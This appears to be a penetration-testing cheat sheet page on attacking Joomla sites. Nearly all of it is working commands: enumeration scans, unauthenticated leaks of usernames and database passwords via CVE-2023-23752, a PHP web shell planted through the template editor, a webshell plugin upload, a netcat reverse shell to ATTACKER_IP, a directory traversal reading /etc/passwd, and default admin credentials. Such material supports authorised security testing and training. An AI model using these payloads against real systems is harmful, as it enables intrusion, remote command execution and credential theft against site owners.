Joomla

Discovery

# Check robots.txt for Joomla paths
curl http://TARGET/robots.txt

# Version in XML
curl -s http://TARGET/administrator/manifests/files/joomla.xml | grep version

# README file
curl -s http://TARGET/README.txt | head

# Login page
/administrator/

Enumeration Tools

JoomScan

# Install
apt install joomscan

# Basic scan
joomscan -u http://TARGET

# Enumerate components
joomscan -u http://TARGET -ec

droopescan

# Also works for Joomla
droopescan scan joomla -u http://TARGET

CVE-2023-23752 - Information Disclosure (Unauthenticated)

Affects: Joomla 4.0.0 - 4.2.7

Leaks usernames and database credentials via REST API without authentication.

Manual Exploitation

# Leak usernames
curl -s "http://TARGET/api/index.php/v1/users?public=true" | jq

# Leak DB password (check all fields)
curl -s "http://TARGET/api/index.php/v1/config/application?public=true" | jq

Automated Exploit

git clone https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT.git
python3 CVE-2023-23752.py -u http://TARGET

Template Editor RCE (Authenticated)

Login to /administrator with admin creds
Navigate: Extensions → Templates → Templates
Select a template (e.g., protostar)
Edit error.php or another file
Add PHP web shell:

system($_GET['cmd']);

Save and access:

curl http://TARGET/templates/protostar/error.php?cmd=id

Webshell Plugin Upload (Authenticated)

Alternative to template editing - upload a malicious module.

Setup

git clone https://github.com/p0dalirius/Joomla-webshell-plugin
cd Joomla-webshell-plugin
make
# Creates: ./dist/joomla-webshell-plugin-1.1.0.zip

Upload

Login to /administrator
Navigate: System → Install → Extensions
- Or directly: /administrator/index.php?option=com_installer&view=install
Upload the ZIP file
"Installation of the module was successful"

Execute Commands

# Test
curl -X POST 'http://TARGET/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id"

# Reverse shell
curl -X POST 'http://TARGET/modules/mod_webshell/mod_webshell.php' \
  --data "action=exec&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Csh%20-i%202%3E%261%7Cnc%20ATTACKER_IP%209001%20%3E/tmp/f"

CVE-2019-10945 (Directory Traversal)

Affects: Joomla 1.5.0 - 3.9.4

Requires: Valid admin credentials

Exploit

# List directory contents
python2.7 joomla_dir_trav.py --url "http://TARGET/administrator/" --username admin --password admin --dir /

# Read specific file
python2.7 joomla_dir_trav.py --url "http://TARGET/administrator/" --username admin --password admin --dir /etc/passwd

PoC: https://www.exploit-db.com/exploits/46710

Config File

# Database credentials
/configuration.php

# Contains:
public $user = 'joomla_user';
public $password = 'password123';
public $db = 'joomla_db';

Important Paths

Path

Description

/administrator/

Admin login

/configuration.php

Main config (DB creds)

/templates/

Template files

/plugins/

Plugin directory

/components/

Components

/modules/

Modules

Default Credentials

admin:admin
administrator:administrator

PreviousWordPress NextDrupal

Last updated 25 days ago

hashtagDiscovery

hashtagEnumeration Tools

hashtagJoomScan

hashtagdroopescan

hashtagCVE-2023-23752 - Information Disclosure (Unauthenticated)

hashtagManual Exploitation

hashtagAutomated Exploit

hashtagTemplate Editor RCE (Authenticated)

hashtagWebshell Plugin Upload (Authenticated)

hashtagSetup

hashtagUpload

hashtagExecute Commands

hashtagCVE-2019-10945 (Directory Traversal)

hashtagExploit

hashtagConfig File

hashtagImportant Paths

hashtagDefault Credentials